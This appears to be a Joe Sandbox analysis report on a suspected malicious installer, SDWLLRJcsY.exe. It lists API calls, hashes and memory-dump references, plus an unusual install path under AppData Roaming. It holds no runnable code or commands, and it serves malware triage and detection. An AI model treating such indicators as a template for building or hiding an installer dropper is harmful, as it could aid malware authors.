                                        • Part of subcall function 004065B6: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                      • String ID:
                                      • API String ID: 2547128583-0
                                      • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                      • Instruction ID: 40ec7d190cb489a8bb7bfdeabdf724fb2ab18eb81f375fb852db001ef300dc43
                                      • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                      • Instruction Fuzzy Hash: 06E0863250421166D211A6705E4487763AD9E95650707883FF956F2181D7399C31A66E
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SDWLLRJcsY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: File$AttributesCreate
                                      • String ID:
                                      • API String ID: 415043291-0
                                      • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                      • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                      • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                      • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                      • Instruction ID: 51a2066edc4c2a81eeb0428f2148d4bf8de4f40e885bab3ef7b7d11008f75862
                                      • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                      • Instruction Fuzzy Hash: 72D0C972505420ABC2512728AF0C89BBB95DB542717028B35FAA9A22B0CB304C569A98
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00405802
                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryErrorLast
                                      • String ID:
                                      • API String ID: 1375471231-0
                                      • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                      • Instruction ID: ef554e49865ddd63361da1c12a2af0f36bd739cc66983d197ffc2c9f8e40d56f
                                      • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                      • Instruction Fuzzy Hash: 69C04C71225501DBDB507F219F09B177A54AFA0741F15C83AA586E10E0DA748465DB2D
                                      APIs
                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: FileMove
                                      • String ID:
                                      • API String ID: 3562171763-0
                                      • Opcode ID: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
                                      • Instruction ID: 3e6e6754c95f31a417227132d94fb2ae884618af556d43a54845cec5a9764f61
                                      • Opcode Fuzzy Hash: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
                                      • Instruction Fuzzy Hash: 20F02431608114A7CB20BBA54F0DE6F61648F963A8F24073FB011B22E1EABC8902956F
                                      APIs
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: PrivateProfileStringWrite
                                      • String ID:
                                      • API String ID: 390214022-0
                                      • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                      • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                      • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                      • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                      APIs
                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406110
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                      • Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                      • Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78
                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032F2,00000000,00000000,00403149,?,00000004,00000000,00000000,00000000), ref: 00405DD5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                      • Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
                                      • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                      • Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4
                                      APIs
                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032C0,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E04
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      APIs
                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                      Similarity
                                      • API ID: PrivateProfileString
                                      • String ID:
                                      • API String ID: 1096422788-0
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406147,?,00000000,?,?,: Completed,?), ref: 004060DD
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      APIs
                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      APIs
                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      APIs
                                      • SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D
                                      Similarity
                                      • API ID: CallbackDispatcherUser
                                      • String ID:
                                      • API String ID: 2492992576-0
                                      APIs
                                        • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                        • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                        • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                        • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed), ref: 0040531D
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                        • Part of subcall function 00405831: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                        • Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                        • Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
                                        • Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670A
                                        • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                      Similarity
                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                      • String ID:
                                      • API String ID: 2972824698-0
                                      APIs
                                      • GetDlgItem.USER32(?,000003F9), ref: 00404C44
                                      • GetDlgItem.USER32(?,00000408), ref: 00404C4F
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                      • LoadBitmapW.USER32(0000006E), ref: 00404CAC
                                      • SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                      • DeleteObject.GDI32(00000000), ref: 00404D22
                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
                                      • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                      • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                      • GlobalFree.KERNEL32(?), ref: 0040505C
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
                                      • ShowWindow.USER32(?,00000000), ref: 004051FB
                                      • GetDlgItem.USER32(?,000003FE), ref: 00405206
                                      • ShowWindow.USER32(00000000), ref: 0040520D
                                      Similarity
                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                      • String ID: $M$N
                                      • API String ID: 1638840714-813528018
                                      • Opcode ID: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
                                      • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
                                      • Opcode Fuzzy Hash: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
                                      • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
                                      APIs
                                      • GetDlgItem.USER32(?,000003FB), ref: 004046FF
                                      • SetWindowTextW.USER32(00000000,?), ref: 00404729
                                      • SHBrowseForFolderW.SHELL32(?), ref: 004047DA
                                      • CoTaskMemFree.OLE32(00000000), ref: 004047E5
                                      • lstrcmpiW.KERNEL32(: Completed,004236E8,00000000,?,?), ref: 00404817
                                      • lstrcatW.KERNEL32(?,: Completed), ref: 00404823
                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404835
                                        • Part of subcall function 00405892: GetDlgItemTextW.USER32(?,?,00000400,0040486C), ref: 004058A5
                                        • Part of subcall function 004064E0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                        • Part of subcall function 004064E0: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                        • Part of subcall function 004064E0: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                        • Part of subcall function 004064E0: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                      • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 004048F8
                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404913
                                        • Part of subcall function 00404A6C: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                        • Part of subcall function 00404A6C: wsprintfW.USER32 ref: 00404B16
                                        • Part of subcall function 00404A6C: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: : Completed$A$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$6B
                                      • API String ID: 2624150263-1256906607
